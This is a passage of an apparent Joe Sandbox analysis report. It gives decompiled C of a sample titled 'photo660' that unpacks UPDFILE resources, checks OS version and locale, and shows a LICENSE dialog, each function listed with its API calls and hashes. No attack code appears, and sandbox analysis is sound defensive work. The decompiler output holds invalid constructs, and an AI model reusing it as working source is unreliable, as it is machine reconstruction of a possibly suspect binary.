                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0xbca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E00BC171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00BC6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC171E: _vsnprintf.MSVCRT ref: 00BC1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00BC6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00BC51CA,00000004,00000024,00BC2F71,?,00000002,00000000), ref: 00BC6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: fa7921a4d9c445c376f40e47b03fb0c7b620fbd2e9043dc35f5703a4ac931210
                                                                                                                                                                                                        • Instruction ID: 41a09e730be1d4831f8c3c62a861b7e836b3ed62af2f6594c1f71c03bbbc86c9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa7921a4d9c445c376f40e47b03fb0c7b620fbd2e9043dc35f5703a4ac931210
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7721E775A00219ABDB109F68DC49EFFBBB8FF89714B14015DF902A3241DB359D068BE5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xbc81d8; // 0xfffffffe
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xbc81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xbc81d8; // 0xfffffffe
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xbc1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E00BC66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xbc81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00BC686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00BC68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00BC68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00BC1140,00000000,?,?,0000000C), ref: 00BC68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BC6902
                                                                                                                                                                                                          • Part of subcall function 00BC66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00BC691A), ref: 00BC6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00BC68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 48b7736434e10599ac798c11aad5d862157937785e51606aa83c44d9bcfed4ec
                                                                                                                                                                                                        • Instruction ID: dcd402920d4aba4dfbafc7eaf284f3d8a5cbdc8f71466964751d030feda45e19
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48b7736434e10599ac798c11aad5d862157937785e51606aa83c44d9bcfed4ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC316D31A002289FDB21CB11CC45FAAB7F9FB8D768F0401E9E949A7150DBB09E85CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E00BC468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0xbc8d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E00BC468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0xbc8d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0xbc8d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0xbc9124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E00BC6517(_t19, 0x7d1, 0, E00BC3100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0xbc8d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xbc9124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0xbc8d4c);
                                                                                                                                                                                                        					 *0xbc9124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00BC2F64,?,00000002,00000000), ref: 00BC3A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00BC3AB3
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00BC3AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00BC3B13
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FindResourceA.KERNEL32(00BC0000,000007D6,00000005), ref: 00BC652A
                                                                                                                                                                                                          • Part of subcall function 00BC6517: LoadResource.KERNEL32(00BC0000,00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00BC6538
                                                                                                                                                                                                          • Part of subcall function 00BC6517: DialogBoxIndirectParamA.USER32(00BC0000,00000000,00000547,00BC19E0,00000000), ref: 00BC6557
                                                                                                                                                                                                          • Part of subcall function 00BC6517: FreeResource.KERNEL32(00000000,?,?,00BC2EE8,00000000,00BC19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00BC6560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00BC3100,00000000,00000000), ref: 00BC3AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: 010b025343b9ada5682411d8e8c8e38feaf20b83a07e8ff636e66b0b4e7a5cbe
                                                                                                                                                                                                        • Instruction ID: 561a6dbeea46fd246b1e10f2bd5ee27158988fad6d4ff53ba47a926467f2f6a9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 010b025343b9ada5682411d8e8c8e38feaf20b83a07e8ff636e66b0b4e7a5cbe
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A311D671300201ABD724AF32AC09F1B3AF9DBDDB40B14847EB546EB2A1DE798C108721
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC24E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E00BC658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00BC2506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00BC252C
                                                                                                                                                                                                        • _lopen.KERNEL32(?,00000040), ref: 00BC253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00BC254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00BC2555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: fa13c60b570e79c6d665446bc14c846faf6f5da7c10557ddce099b652b17a357
                                                                                                                                                                                                        • Instruction ID: e978de337e164e25418f5ec1d8a2a79ae21a472b1a340a83911e7a397279103c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa13c60b570e79c6d665446bc14c846faf6f5da7c10557ddce099b652b17a357
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B501D832A0011C67C7209B65DC0CEDFBBBCDB59794F0001A9FA49D3190DF748E45CAA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00BC36EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0xbc8184 = 1;
                                                                                                                                                                                                        						 *0xbc8180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0xbc9a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0xbc8a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00BC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00BC2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0xbc8a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0xbc8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("photo660");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E00BC681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "photo660", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E00BC67C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E00BC28E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
